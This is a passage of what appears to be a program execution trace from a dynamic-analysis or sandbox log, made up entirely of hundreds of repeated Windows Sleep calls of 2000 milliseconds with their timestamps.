Sleep (dwMilliseconds=0x7d0) [0275.204] Sleep (dwMilliseconds=0x7d0) [0275.205] Sleep (dwMilliseconds=0x7d0) [0275.211] Sleep (dwMilliseconds=0x7d0) [0275.221] Sleep (dwMilliseconds=0x7d0) [0275.222] Sleep (dwMilliseconds=0x7d0) [0275.262] Sleep (dwMilliseconds=0x7d0) [0275.265] Sleep (dwMilliseconds=0x7d0) [0275.272] Sleep (dwMilliseconds=0x7d0) [0275.279] Sleep (dwMilliseconds=0x7d0) [0275.287] Sleep (dwMilliseconds=0x7d0) [0275.288] Sleep (dwMilliseconds=0x7d0) [0275.296] Sleep (dwMilliseconds=0x7d0) [0275.297] Sleep (dwMilliseconds=0x7d0) [0275.304] Sleep (dwMilliseconds=0x7d0) [0275.305] Sleep (dwMilliseconds=0x7d0) [0275.307] Sleep (dwMilliseconds=0x7d0) [0275.312] Sleep (dwMilliseconds=0x7d0) [0275.319] Sleep (dwMilliseconds=0x7d0) [0275.321] Sleep (dwMilliseconds=0x7d0) [0275.326] Sleep (dwMilliseconds=0x7d0) [0275.333] Sleep (dwMilliseconds=0x7d0) [0275.340] Sleep (dwMilliseconds=0x7d0) [0275.341] Sleep (dwMilliseconds=0x7d0) [0275.347] Sleep (dwMilliseconds=0x7d0) [0275.350] Sleep (dwMilliseconds=0x7d0) [0275.354] Sleep (dwMilliseconds=0x7d0) [0275.355] Sleep (dwMilliseconds=0x7d0) [0275.369] Sleep (dwMilliseconds=0x7d0) [0275.370] Sleep (dwMilliseconds=0x7d0) [0275.377] Sleep (dwMilliseconds=0x7d0) [0275.384] Sleep (dwMilliseconds=0x7d0) [0275.385] Sleep (dwMilliseconds=0x7d0) [0275.390] Sleep (dwMilliseconds=0x7d0) [0275.392] Sleep (dwMilliseconds=0x7d0) [0275.397] Sleep (dwMilliseconds=0x7d0) [0275.399] Sleep (dwMilliseconds=0x7d0) [0275.402] Sleep (dwMilliseconds=0x7d0) [0275.404] Sleep (dwMilliseconds=0x7d0) [0275.406] Sleep (dwMilliseconds=0x7d0) [0275.412] Sleep (dwMilliseconds=0x7d0) [0275.413] Sleep (dwMilliseconds=0x7d0) [0275.419] Sleep (dwMilliseconds=0x7d0) [0275.420] Sleep (dwMilliseconds=0x7d0) [0275.426] Sleep (dwMilliseconds=0x7d0) [0275.427] Sleep (dwMilliseconds=0x7d0) [0275.434] Sleep (dwMilliseconds=0x7d0) [0275.440] Sleep (dwMilliseconds=0x7d0) [0275.441] Sleep (dwMilliseconds=0x7d0) [0275.446] Sleep (dwMilliseconds=0x7d0) [0275.447] Sleep (dwMilliseconds=0x7d0) [0275.454] Sleep (dwMilliseconds=0x7d0) [0275.455] Sleep (dwMilliseconds=0x7d0) [0275.462] Sleep (dwMilliseconds=0x7d0) [0275.464] Sleep (dwMilliseconds=0x7d0) [0275.470] Sleep (dwMilliseconds=0x7d0) [0275.476] Sleep (dwMilliseconds=0x7d0) [0275.483] Sleep (dwMilliseconds=0x7d0) [0275.485] Sleep (dwMilliseconds=0x7d0) [0275.491] Sleep (dwMilliseconds=0x7d0) [0275.497] Sleep (dwMilliseconds=0x7d0) [0275.504] Sleep (dwMilliseconds=0x7d0) [0275.505] Sleep (dwMilliseconds=0x7d0) [0275.511] Sleep (dwMilliseconds=0x7d0) [0275.517] Sleep (dwMilliseconds=0x7d0) [0275.519] Sleep (dwMilliseconds=0x7d0) [0275.524] Sleep (dwMilliseconds=0x7d0) [0275.526] Sleep (dwMilliseconds=0x7d0) [0275.531] Sleep (dwMilliseconds=0x7d0) [0275.535] Sleep (dwMilliseconds=0x7d0) [0275.539] Sleep (dwMilliseconds=0x7d0) [0275.540] Sleep (dwMilliseconds=0x7d0) [0275.545] Sleep (dwMilliseconds=0x7d0) [0275.547] Sleep (dwMilliseconds=0x7d0) [0275.552] Sleep (dwMilliseconds=0x7d0) [0275.553] Sleep (dwMilliseconds=0x7d0) [0275.560] Sleep (dwMilliseconds=0x7d0) [0275.561] Sleep (dwMilliseconds=0x7d0) [0275.566] Sleep (dwMilliseconds=0x7d0) [0275.567] Sleep (dwMilliseconds=0x7d0) [0275.574] Sleep (dwMilliseconds=0x7d0) [0275.580] Sleep (dwMilliseconds=0x7d0) [0275.587] Sleep (dwMilliseconds=0x7d0) [0275.597] Sleep (dwMilliseconds=0x7d0) [0275.600] Sleep (dwMilliseconds=0x7d0) [0275.607] Sleep (dwMilliseconds=0x7d0) [0275.608] Sleep (dwMilliseconds=0x7d0) [0275.617] Sleep (dwMilliseconds=0x7d0) [0275.625] Sleep (dwMilliseconds=0x7d0) [0275.627] Sleep (dwMilliseconds=0x7d0) [0275.628] Sleep (dwMilliseconds=0x7d0) [0275.637] Sleep (dwMilliseconds=0x7d0) [0275.647] Sleep (dwMilliseconds=0x7d0) [0275.649] Sleep (dwMilliseconds=0x7d0) [0275.660] Sleep (dwMilliseconds=0x7d0) [0275.669] Sleep (dwMilliseconds=0x7d0) [0275.671] Sleep (dwMilliseconds=0x7d0) [0275.680] Sleep (dwMilliseconds=0x7d0) [0275.681] Sleep (dwMilliseconds=0x7d0) [0275.690] Sleep (dwMilliseconds=0x7d0) [0275.698] Sleep (dwMilliseconds=0x7d0) [0275.700] Sleep (dwMilliseconds=0x7d0) [0275.708] Sleep (dwMilliseconds=0x7d0) [0275.713] Sleep (dwMilliseconds=0x7d0) [0275.716] Sleep (dwMilliseconds=0x7d0) [0275.717] Sleep (dwMilliseconds=0x7d0) [0275.724] Sleep (dwMilliseconds=0x7d0) [0275.725] Sleep (dwMilliseconds=0x7d0) [0275.731] Sleep (dwMilliseconds=0x7d0) [0275.738] Sleep (dwMilliseconds=0x7d0) [0275.746] Sleep (dwMilliseconds=0x7d0) [0275.747] Sleep (dwMilliseconds=0x7d0) [0275.756] Sleep (dwMilliseconds=0x7d0) [0275.776] Sleep (dwMilliseconds=0x7d0) [0275.782] Sleep (dwMilliseconds=0x7d0) [0275.784] Sleep (dwMilliseconds=0x7d0) [0275.786] Sleep (dwMilliseconds=0x7d0) [0275.794] Sleep (dwMilliseconds=0x7d0) [0275.802] Sleep (dwMilliseconds=0x7d0) [0275.811] Sleep (dwMilliseconds=0x7d0) [0275.819] Sleep (dwMilliseconds=0x7d0) [0275.825] Sleep (dwMilliseconds=0x7d0) [0275.826] Sleep (dwMilliseconds=0x7d0) [0275.832] Sleep (dwMilliseconds=0x7d0) [0275.833] Sleep (dwMilliseconds=0x7d0) [0275.839] Sleep (dwMilliseconds=0x7d0) [0275.840] Sleep (dwMilliseconds=0x7d0) [0275.846] Sleep (dwMilliseconds=0x7d0) [0275.847] Sleep (dwMilliseconds=0x7d0) [0275.853] Sleep (dwMilliseconds=0x7d0) [0275.854] Sleep (dwMilliseconds=0x7d0) [0275.860] Sleep (dwMilliseconds=0x7d0) [0275.861] Sleep (dwMilliseconds=0x7d0) [0275.868] Sleep (dwMilliseconds=0x7d0) [0275.913] Sleep (dwMilliseconds=0x7d0) [0275.918] Sleep (dwMilliseconds=0x7d0) [0275.919] Sleep (dwMilliseconds=0x7d0) [0275.927] Sleep (dwMilliseconds=0x7d0) [0275.935] Sleep (dwMilliseconds=0x7d0) [0275.944] Sleep (dwMilliseconds=0x7d0) [0275.946] Sleep (dwMilliseconds=0x7d0) [0275.954] Sleep (dwMilliseconds=0x7d0) [0275.955] Sleep (dwMilliseconds=0x7d0) [0275.960] Sleep (dwMilliseconds=0x7d0) [0275.963] Sleep (dwMilliseconds=0x7d0) [0275.970] Sleep (dwMilliseconds=0x7d0) [0275.972] Sleep (dwMilliseconds=0x7d0) [0275.979] Sleep (dwMilliseconds=0x7d0) [0275.987] Sleep (dwMilliseconds=0x7d0) [0275.995] Sleep (dwMilliseconds=0x7d0) [0275.997] Sleep (dwMilliseconds=0x7d0) [0276.003] Sleep (dwMilliseconds=0x7d0) [0276.004] Sleep (dwMilliseconds=0x7d0) [0276.006] Sleep (dwMilliseconds=0x7d0) [0276.014] Sleep (dwMilliseconds=0x7d0) [0276.015] Sleep (dwMilliseconds=0x7d0) [0276.022] Sleep (dwMilliseconds=0x7d0) [0276.023] Sleep (dwMilliseconds=0x7d0) [0276.030] Sleep (dwMilliseconds=0x7d0) [0276.031] Sleep (dwMilliseconds=0x7d0) [0276.038] Sleep (dwMilliseconds=0x7d0) [0276.040] Sleep (dwMilliseconds=0x7d0) [0276.047] Sleep (dwMilliseconds=0x7d0) [0276.048] Sleep (dwMilliseconds=0x7d0) [0276.050] Sleep (dwMilliseconds=0x7d0) [0276.055] Sleep (dwMilliseconds=0x7d0) [0276.056] Sleep (dwMilliseconds=0x7d0) [0276.063] Sleep (dwMilliseconds=0x7d0) [0276.064] Sleep (dwMilliseconds=0x7d0) [0276.071] Sleep (dwMilliseconds=0x7d0) [0276.080] Sleep (dwMilliseconds=0x7d0) [0276.081] Sleep (dwMilliseconds=0x7d0) [0276.089] Sleep (dwMilliseconds=0x7d0) [0276.090] Sleep (dwMilliseconds=0x7d0) [0276.095] Sleep (dwMilliseconds=0x7d0) [0276.098] Sleep (dwMilliseconds=0x7d0) [0276.099] Sleep (dwMilliseconds=0x7d0) [0276.106] Sleep (dwMilliseconds=0x7d0) [0276.116] Sleep (dwMilliseconds=0x7d0) [0276.123] Sleep (dwMilliseconds=0x7d0) [0276.124] Sleep (dwMilliseconds=0x7d0) [0276.131] Sleep (dwMilliseconds=0x7d0) [0276.133] Sleep (dwMilliseconds=0x7d0) [0276.138] Sleep (dwMilliseconds=0x7d0) [0276.140] Sleep (dwMilliseconds=0x7d0) [0276.142] Sleep (dwMilliseconds=0x7d0) [0276.150] Sleep (dwMilliseconds=0x7d0) [0276.151] Sleep (dwMilliseconds=0x7d0) [0276.158] Sleep (dwMilliseconds=0x7d0) [0276.159] Sleep (dwMilliseconds=0x7d0) [0276.166] Sleep (dwMilliseconds=0x7d0) [0276.167] Sleep (dwMilliseconds=0x7d0) [0276.174] Sleep (dwMilliseconds=0x7d0) [0276.175] Sleep (dwMilliseconds=0x7d0) [0276.182] Sleep (dwMilliseconds=0x7d0) [0276.191] Sleep (dwMilliseconds=0x7d0) [0276.193] Sleep (dwMilliseconds=0x7d0) [0276.200] Sleep (dwMilliseconds=0x7d0) [0276.202] Sleep (dwMilliseconds=0x7d0) [0276.210] Sleep (dwMilliseconds=0x7d0) [0276.219] Sleep (dwMilliseconds=0x7d0) [0276.221] Sleep (dwMilliseconds=0x7d0) [0276.228] Sleep (dwMilliseconds=0x7d0) [0276.229] Sleep (dwMilliseconds=0x7d0) [0276.237] Sleep (dwMilliseconds=0x7d0) [0276.245] Sleep (dwMilliseconds=0x7d0) [0276.246] Sleep (dwMilliseconds=0x7d0) [0276.253] Sleep (dwMilliseconds=0x7d0) [0276.261] Sleep (dwMilliseconds=0x7d0) [0276.263] Sleep (dwMilliseconds=0x7d0) [0276.271] Sleep (dwMilliseconds=0x7d0) [0276.274] Sleep (dwMilliseconds=0x7d0) [0276.279] Sleep (dwMilliseconds=0x7d0) [0276.281] Sleep (dwMilliseconds=0x7d0) [0276.288] Sleep (dwMilliseconds=0x7d0) [0276.296] Sleep (dwMilliseconds=0x7d0) [0276.306] Sleep (dwMilliseconds=0x7d0) [0276.307] Sleep (dwMilliseconds=0x7d0) [0276.319] Sleep (dwMilliseconds=0x7d0) [0276.320] Sleep (dwMilliseconds=0x7d0) [0276.324] Sleep (dwMilliseconds=0x7d0) [0276.330] Sleep (dwMilliseconds=0x7d0) [0276.332] Sleep (dwMilliseconds=0x7d0) [0276.339] Sleep (dwMilliseconds=0x7d0) [0276.341] Sleep (dwMilliseconds=0x7d0) [0276.349] Sleep (dwMilliseconds=0x7d0) [0276.350] Sleep (dwMilliseconds=0x7d0) [0276.359] Sleep (dwMilliseconds=0x7d0) [0276.360] Sleep (dwMilliseconds=0x7d0) [0276.377] Sleep (dwMilliseconds=0x7d0) [0276.378] Sleep (dwMilliseconds=0x7d0) [0276.387] Sleep (dwMilliseconds=0x7d0) [0276.388] Sleep (dwMilliseconds=0x7d0) [0276.396] Sleep (dwMilliseconds=0x7d0) [0276.398] Sleep (dwMilliseconds=0x7d0) [0276.406] Sleep (dwMilliseconds=0x7d0) [0276.407] Sleep (dwMilliseconds=0x7d0) [0276.415] Sleep (dwMilliseconds=0x7d0) [0276.422] Sleep (dwMilliseconds=0x7d0) [0276.424] Sleep (dwMilliseconds=0x7d0) [0276.426] Sleep (dwMilliseconds=0x7d0) [0276.434] Sleep (dwMilliseconds=0x7d0) [0276.435] Sleep (dwMilliseconds=0x7d0) [0276.442] Sleep (dwMilliseconds=0x7d0) [0276.451] Sleep (dwMilliseconds=0x7d0) [0276.460] Sleep (dwMilliseconds=0x7d0) [0276.466] Sleep (dwMilliseconds=0x7d0) [0276.469] Sleep (dwMilliseconds=0x7d0) [0276.470] Sleep (dwMilliseconds=0x7d0) [0276.478] Sleep (dwMilliseconds=0x7d0) [0276.666] Sleep (dwMilliseconds=0x7d0) [0276.675] Sleep (dwMilliseconds=0x7d0) [0276.683] Sleep (dwMilliseconds=0x7d0) [0276.691] Sleep (dwMilliseconds=0x7d0) [0276.692] Sleep (dwMilliseconds=0x7d0) [0276.700] Sleep (dwMilliseconds=0x7d0) [0276.708] Sleep (dwMilliseconds=0x7d0) [0276.709] Sleep (dwMilliseconds=0x7d0) [0276.718] Sleep (dwMilliseconds=0x7d0) [0276.719] Sleep (dwMilliseconds=0x7d0) [0276.728] Sleep (dwMilliseconds=0x7d0) [0276.738] Sleep (dwMilliseconds=0x7d0) [0276.746] Sleep (dwMilliseconds=0x7d0) [0276.748] Sleep (dwMilliseconds=0x7d0) [0276.752] Sleep (dwMilliseconds=0x7d0) [0276.756] Sleep (dwMilliseconds=0x7d0) [0276.766] Sleep (dwMilliseconds=0x7d0) [0276.774] Sleep (dwMilliseconds=0x7d0) [0276.782] Sleep (dwMilliseconds=0x7d0) [0276.791] Sleep (dwMilliseconds=0x7d0) [0276.792] Sleep (dwMilliseconds=0x7d0) [0276.796] Sleep (dwMilliseconds=0x7d0) [0276.800] Sleep (dwMilliseconds=0x7d0) [0276.808] Sleep (dwMilliseconds=0x7d0) [0276.817] Sleep (dwMilliseconds=0x7d0) [0276.825] Sleep (dwMilliseconds=0x7d0) [0276.826] Sleep (dwMilliseconds=0x7d0) [0276.835] Sleep (dwMilliseconds=0x7d0) [0276.837] Sleep (dwMilliseconds=0x7d0) [0276.842] Sleep (dwMilliseconds=0x7d0) [0276.844] Sleep (dwMilliseconds=0x7d0) [0276.845] Sleep (dwMilliseconds=0x7d0) [0276.855] Sleep (dwMilliseconds=0x7d0) [0276.856] Sleep (dwMilliseconds=0x7d0) [0276.866] Sleep (dwMilliseconds=0x7d0) [0276.904] Sleep (dwMilliseconds=0x7d0) [0276.909] Sleep (dwMilliseconds=0x7d0) [0276.918] Sleep (dwMilliseconds=0x7d0) [0276.923] Sleep (dwMilliseconds=0x7d0) [0276.927] Sleep (dwMilliseconds=0x7d0) [0276.928] Sleep (dwMilliseconds=0x7d0) [0276.936] Sleep (dwMilliseconds=0x7d0) [0276.937] Sleep (dwMilliseconds=0x7d0) [0276.944] Sleep (dwMilliseconds=0x7d0) [0276.953] Sleep (dwMilliseconds=0x7d0) [0276.961] Sleep (dwMilliseconds=0x7d0) [0276.963] Sleep (dwMilliseconds=0x7d0) [0276.968] Sleep (dwMilliseconds=0x7d0) [0276.971] Sleep (dwMilliseconds=0x7d0) [0276.973] Sleep (dwMilliseconds=0x7d0) [0276.979] Sleep (dwMilliseconds=0x7d0) [0276.981] Sleep (dwMilliseconds=0x7d0) [0276.988] Sleep (dwMilliseconds=0x7d0) [0276.990] Sleep (dwMilliseconds=0x7d0) [0276.997] Sleep (dwMilliseconds=0x7d0) [0276.999] Sleep (dwMilliseconds=0x7d0) [0277.006] Sleep (dwMilliseconds=0x7d0) [0277.008] Sleep (dwMilliseconds=0x7d0) [0277.013] Sleep (dwMilliseconds=0x7d0) [0277.016] Sleep (dwMilliseconds=0x7d0) [0277.025] Sleep (dwMilliseconds=0x7d0) [0277.027] Sleep (dwMilliseconds=0x7d0) [0277.034] Sleep (dwMilliseconds=0x7d0) [0277.036] Sleep (dwMilliseconds=0x7d0) [0277.043] Sleep (dwMilliseconds=0x7d0) [0277.051] Sleep (dwMilliseconds=0x7d0) [0277.057] Sleep (dwMilliseconds=0x7d0) [0277.060] Sleep (dwMilliseconds=0x7d0) [0277.069] Sleep (dwMilliseconds=0x7d0) [0277.078] Sleep (dwMilliseconds=0x7d0) [0277.086] Sleep (dwMilliseconds=0x7d0) [0277.087] Sleep (dwMilliseconds=0x7d0) [0277.095] Sleep (dwMilliseconds=0x7d0) [0277.096] Sleep (dwMilliseconds=0x7d0) [0277.101] Sleep (dwMilliseconds=0x7d0) [0277.103] Sleep (dwMilliseconds=0x7d0) [0277.105] Sleep (dwMilliseconds=0x7d0) [0277.113] Sleep (dwMilliseconds=0x7d0) [0277.122] Sleep (dwMilliseconds=0x7d0) [0277.124] Sleep (dwMilliseconds=0x7d0) [0277.131] Sleep (dwMilliseconds=0x7d0) [0277.140] Sleep (dwMilliseconds=0x7d0) [0277.141] Sleep (dwMilliseconds=0x7d0) [0277.145] Sleep (dwMilliseconds=0x7d0) [0277.149] Sleep (dwMilliseconds=0x7d0) [0277.151] Sleep (dwMilliseconds=0x7d0) [0277.158] Sleep (dwMilliseconds=0x7d0) [0277.160] Sleep (dwMilliseconds=0x7d0) [0277.167] Sleep (dwMilliseconds=0x7d0) [0277.170] Sleep (dwMilliseconds=0x7d0) [0277.178] Sleep (dwMilliseconds=0x7d0) [0277.188] Sleep (dwMilliseconds=0x7d0) [0277.191] Sleep (dwMilliseconds=0x7d0) [0277.196] Sleep (dwMilliseconds=0x7d0) [0277.204] Sleep (dwMilliseconds=0x7d0) [0277.207] Sleep (dwMilliseconds=0x7d0) [0277.214] Sleep (dwMilliseconds=0x7d0) [0277.216] Sleep (dwMilliseconds=0x7d0) [0277.223] Sleep (dwMilliseconds=0x7d0) [0277.231] Sleep (dwMilliseconds=0x7d0) [0277.233] Sleep (dwMilliseconds=0x7d0) [0277.235] Sleep (dwMilliseconds=0x7d0) [0277.242] Sleep (dwMilliseconds=0x7d0) [0277.243] Sleep (dwMilliseconds=0x7d0) [0277.251] Sleep (dwMilliseconds=0x7d0) [0277.253] Sleep (dwMilliseconds=0x7d0) [0277.260] Sleep (dwMilliseconds=0x7d0) [0277.268] Sleep (dwMilliseconds=0x7d0) [0277.300] Sleep (dwMilliseconds=0x7d0) [0277.332] Sleep (dwMilliseconds=0x7d0) [0277.336] Sleep (dwMilliseconds=0x7d0) [0277.339] Sleep (dwMilliseconds=0x7d0) [0277.349] Sleep (dwMilliseconds=0x7d0) [0277.358] Sleep (dwMilliseconds=0x7d0) [0277.360] Sleep (dwMilliseconds=0x7d0) [0277.382] Sleep (dwMilliseconds=0x7d0) [0277.391] Sleep (dwMilliseconds=0x7d0) [0277.393] Sleep (dwMilliseconds=0x7d0) [0277.394] Sleep (dwMilliseconds=0x7d0) [0277.400] Sleep (dwMilliseconds=0x7d0) [0277.409] Sleep (dwMilliseconds=0x7d0) [0277.410] Sleep (dwMilliseconds=0x7d0) [0277.417] Sleep (dwMilliseconds=0x7d0) [0277.419] Sleep (dwMilliseconds=0x7d0) [0277.428] Sleep (dwMilliseconds=0x7d0) [0277.436] Sleep (dwMilliseconds=0x7d0) [0277.438] Sleep (dwMilliseconds=0x7d0) [0277.445] Sleep (dwMilliseconds=0x7d0) [0277.447] Sleep (dwMilliseconds=0x7d0) [0277.455] Sleep (dwMilliseconds=0x7d0) [0277.457] Sleep (dwMilliseconds=0x7d0) [0277.465] Sleep (dwMilliseconds=0x7d0) [0277.466] Sleep (dwMilliseconds=0x7d0) [0277.475] Sleep (dwMilliseconds=0x7d0) [0277.483] Sleep (dwMilliseconds=0x7d0) [0277.484] Sleep (dwMilliseconds=0x7d0) [0277.493] Sleep (dwMilliseconds=0x7d0) [0277.501] Sleep (dwMilliseconds=0x7d0) [0277.503] Sleep (dwMilliseconds=0x7d0) [0277.510] Sleep (dwMilliseconds=0x7d0) [0277.519] Sleep (dwMilliseconds=0x7d0) [0277.520] Sleep (dwMilliseconds=0x7d0) [0277.527] Sleep (dwMilliseconds=0x7d0) [0277.528] Sleep (dwMilliseconds=0x7d0) [0277.536] Sleep (dwMilliseconds=0x7d0) [0277.538] Sleep (dwMilliseconds=0x7d0) [0277.545] Sleep (dwMilliseconds=0x7d0) [0277.547] Sleep (dwMilliseconds=0x7d0) [0277.554] Sleep (dwMilliseconds=0x7d0) [0277.556] Sleep (dwMilliseconds=0x7d0) [0277.563] Sleep (dwMilliseconds=0x7d0) [0277.565] Sleep (dwMilliseconds=0x7d0) [0277.573] Sleep (dwMilliseconds=0x7d0) [0277.575] Sleep (dwMilliseconds=0x7d0) [0277.583] Sleep (dwMilliseconds=0x7d0) [0277.585] Sleep (dwMilliseconds=0x7d0) [0277.592] Sleep (dwMilliseconds=0x7d0) [0277.594] Sleep (dwMilliseconds=0x7d0) [0277.601] Sleep (dwMilliseconds=0x7d0) [0277.610] Sleep (dwMilliseconds=0x7d0) [0277.620] Sleep (dwMilliseconds=0x7d0) [0277.622] Sleep (dwMilliseconds=0x7d0) [0277.630] Sleep (dwMilliseconds=0x7d0) [0277.631] Sleep (dwMilliseconds=0x7d0) [0277.639] Sleep (dwMilliseconds=0x7d0) [0277.640] Sleep (dwMilliseconds=0x7d0) [0277.647] Sleep (dwMilliseconds=0x7d0) [0277.649] Sleep (dwMilliseconds=0x7d0) [0277.655] Sleep (dwMilliseconds=0x7d0) [0277.664] Sleep (dwMilliseconds=0x7d0) [0277.665] Sleep (dwMilliseconds=0x7d0) [0277.676] Sleep (dwMilliseconds=0x7d0) [0277.684] Sleep (dwMilliseconds=0x7d0) [0277.693] Sleep (dwMilliseconds=0x7d0) [0277.694] Sleep (dwMilliseconds=0x7d0) [0277.702] Sleep (dwMilliseconds=0x7d0) [0277.703] Sleep (dwMilliseconds=0x7d0) [0277.710] Sleep (dwMilliseconds=0x7d0) [0277.712] Sleep (dwMilliseconds=0x7d0) [0277.722] Sleep (dwMilliseconds=0x7d0) [0277.723] Sleep (dwMilliseconds=0x7d0) [0277.731] Sleep (dwMilliseconds=0x7d0) [0277.733] Sleep (dwMilliseconds=0x7d0) [0277.740] Sleep (dwMilliseconds=0x7d0) [0277.748] Sleep (dwMilliseconds=0x7d0) [0277.755] Sleep (dwMilliseconds=0x7d0) [0277.757] Sleep (dwMilliseconds=0x7d0) [0277.759] Sleep (dwMilliseconds=0x7d0) [0277.766] Sleep (dwMilliseconds=0x7d0) [0277.807] Sleep (dwMilliseconds=0x7d0) [0277.824] Sleep (dwMilliseconds=0x7d0) [0277.826] Sleep (dwMilliseconds=0x7d0) [0277.836] Sleep (dwMilliseconds=0x7d0) [0277.844] Sleep (dwMilliseconds=0x7d0) [0277.848] Sleep (dwMilliseconds=0x7d0) [0277.852] Sleep (dwMilliseconds=0x7d0) [0277.854] Sleep (dwMilliseconds=0x7d0) [0277.862] Sleep (dwMilliseconds=0x7d0) [0277.864] Sleep (dwMilliseconds=0x7d0) [0277.872] Sleep (dwMilliseconds=0x7d0) [0277.882] Sleep (dwMilliseconds=0x7d0) [0277.936] Sleep (dwMilliseconds=0x7d0) [0277.938] Sleep (dwMilliseconds=0x7d0) [0277.941] Sleep (dwMilliseconds=0x7d0) [0277.946] Sleep (dwMilliseconds=0x7d0) [0277.962] Sleep (dwMilliseconds=0x7d0) [0278.000] Sleep (dwMilliseconds=0x7d0) [0278.010] Sleep (dwMilliseconds=0x7d0) [0278.018] Sleep (dwMilliseconds=0x7d0) [0278.033] Sleep (dwMilliseconds=0x7d0) [0278.042] Sleep (dwMilliseconds=0x7d0) [0278.043] Sleep (dwMilliseconds=0x7d0) [0278.051] Sleep (dwMilliseconds=0x7d0) [0278.052] Sleep (dwMilliseconds=0x7d0) [0278.060] Sleep (dwMilliseconds=0x7d0) [0278.061] Sleep (dwMilliseconds=0x7d0) [0278.068] Sleep (dwMilliseconds=0x7d0) [0278.070] Sleep (dwMilliseconds=0x7d0) [0278.077] Sleep (dwMilliseconds=0x7d0) [0278.087] Sleep (dwMilliseconds=0x7d0) [0278.088] Sleep (dwMilliseconds=0x7d0) [0278.096] Sleep (dwMilliseconds=0x7d0) [0278.097] Sleep (dwMilliseconds=0x7d0) [0278.105] Sleep (dwMilliseconds=0x7d0) [0278.113] Sleep (dwMilliseconds=0x7d0) [0278.122] Sleep (dwMilliseconds=0x7d0) [0278.123] Sleep (dwMilliseconds=0x7d0) [0278.131] Sleep (dwMilliseconds=0x7d0) [0278.140] Sleep (dwMilliseconds=0x7d0) [0278.149] Sleep (dwMilliseconds=0x7d0) [0278.150] Sleep (dwMilliseconds=0x7d0) [0278.159] Sleep (dwMilliseconds=0x7d0) [0278.166] Sleep (dwMilliseconds=0x7d0) [0278.170] Sleep (dwMilliseconds=0x7d0) [0278.171] Sleep (dwMilliseconds=0x7d0) [0278.179] Sleep (dwMilliseconds=0x7d0) [0278.181] Sleep (dwMilliseconds=0x7d0) [0278.189] Sleep (dwMilliseconds=0x7d0) [0278.197] Sleep (dwMilliseconds=0x7d0) [0278.199] Sleep (dwMilliseconds=0x7d0) [0278.206] Sleep (dwMilliseconds=0x7d0) [0278.208] Sleep (dwMilliseconds=0x7d0) [0278.213] Sleep (dwMilliseconds=0x7d0) [0278.215] Sleep (dwMilliseconds=0x7d0) [0278.216] Sleep (dwMilliseconds=0x7d0) [0278.224] Sleep (dwMilliseconds=0x7d0) [0278.233] Sleep (dwMilliseconds=0x7d0) [0278.234] Sleep (dwMilliseconds=0x7d0) [0278.243] Sleep (dwMilliseconds=0x7d0) [0278.251] Sleep (dwMilliseconds=0x7d0) [0278.252] Sleep (dwMilliseconds=0x7d0) [0278.257] Sleep (dwMilliseconds=0x7d0) [0278.260] Sleep (dwMilliseconds=0x7d0) [0278.261] Sleep (dwMilliseconds=0x7d0) [0278.269] Sleep (dwMilliseconds=0x7d0) [0278.270] Sleep (dwMilliseconds=0x7d0) [0278.278] Sleep (dwMilliseconds=0x7d0) [0278.289] Sleep (dwMilliseconds=0x7d0) [0278.297] Sleep (dwMilliseconds=0x7d0) [0278.298] Sleep (dwMilliseconds=0x7d0) [0278.303] Sleep (dwMilliseconds=0x7d0) [0278.306] Sleep (dwMilliseconds=0x7d0) [0278.307] Sleep (dwMilliseconds=0x7d0) [0278.315] Sleep (dwMilliseconds=0x7d0) [0278.324] Sleep (dwMilliseconds=0x7d0) [0278.325] Sleep (dwMilliseconds=0x7d0) [0278.333] Sleep (dwMilliseconds=0x7d0) [0278.334] Sleep (dwMilliseconds=0x7d0) [0278.342] Sleep (dwMilliseconds=0x7d0) [0278.344] Sleep (dwMilliseconds=0x7d0) [0278.347] Sleep (dwMilliseconds=0x7d0) [0278.352] Sleep (dwMilliseconds=0x7d0) [0278.354] Sleep (dwMilliseconds=0x7d0) [0278.371] Sleep (dwMilliseconds=0x7d0) [0278.381] Sleep (dwMilliseconds=0x7d0) [0278.390] Sleep (dwMilliseconds=0x7d0) [0278.399] Sleep (dwMilliseconds=0x7d0) [0278.401] Sleep (dwMilliseconds=0x7d0) [0278.410] Sleep (dwMilliseconds=0x7d0) [0278.524] Sleep (dwMilliseconds=0x7d0) [0278.533] Sleep (dwMilliseconds=0x7d0) [0278.539] Sleep (dwMilliseconds=0x7d0) [0278.540] Sleep (dwMilliseconds=0x7d0) [0278.546] Sleep (dwMilliseconds=0x7d0) [0278.554] Sleep (dwMilliseconds=0x7d0) [0278.555] Sleep (dwMilliseconds=0x7d0) [0278.561] Sleep (dwMilliseconds=0x7d0) [0278.562] Sleep (dwMilliseconds=0x7d0) [0278.567] Sleep (dwMilliseconds=0x7d0) [0278.570] Sleep (dwMilliseconds=0x7d0) [0278.571] Sleep (dwMilliseconds=0x7d0) [0278.579] Sleep (dwMilliseconds=0x7d0) [0278.586] Sleep (dwMilliseconds=0x7d0) [0278.593] Sleep (dwMilliseconds=0x7d0) [0278.594] Sleep (dwMilliseconds=0x7d0) [0278.601] Sleep (dwMilliseconds=0x7d0) [0278.602] Sleep (dwMilliseconds=0x7d0) [0278.608] Sleep (dwMilliseconds=0x7d0) [0278.613] Sleep (dwMilliseconds=0x7d0) [0278.615] Sleep (dwMilliseconds=0x7d0) [0278.617] Sleep (dwMilliseconds=0x7d0) [0278.625] Sleep (dwMilliseconds=0x7d0) [0278.627] Sleep (dwMilliseconds=0x7d0) [0278.633] Sleep (dwMilliseconds=0x7d0) [0278.639] Sleep (dwMilliseconds=0x7d0) [0278.647] Sleep (dwMilliseconds=0x7d0) [0278.655] Sleep (dwMilliseconds=0x7d0) [0278.657] Sleep (dwMilliseconds=0x7d0) [0278.659] Sleep (dwMilliseconds=0x7d0) [0278.666] Sleep (dwMilliseconds=0x7d0) [0278.668] Sleep (dwMilliseconds=0x7d0) [0278.675] Sleep (dwMilliseconds=0x7d0) [0278.676] Sleep (dwMilliseconds=0x7d0) [0278.683] Sleep (dwMilliseconds=0x7d0) [0278.689] Sleep (dwMilliseconds=0x7d0) [0278.691] Sleep (dwMilliseconds=0x7d0) [0278.699] Sleep (dwMilliseconds=0x7d0) [0278.704] Sleep (dwMilliseconds=0x7d0) [0278.708] Sleep (dwMilliseconds=0x7d0) [0278.718] Sleep (dwMilliseconds=0x7d0) [0278.721] Sleep (dwMilliseconds=0x7d0) [0278.729] Sleep (dwMilliseconds=0x7d0) [0278.743] Sleep (dwMilliseconds=0x7d0) [0278.744] Sleep (dwMilliseconds=0x7d0) [0278.752] Sleep (dwMilliseconds=0x7d0) [0278.754] Sleep (dwMilliseconds=0x7d0) [0278.762] Sleep (dwMilliseconds=0x7d0) 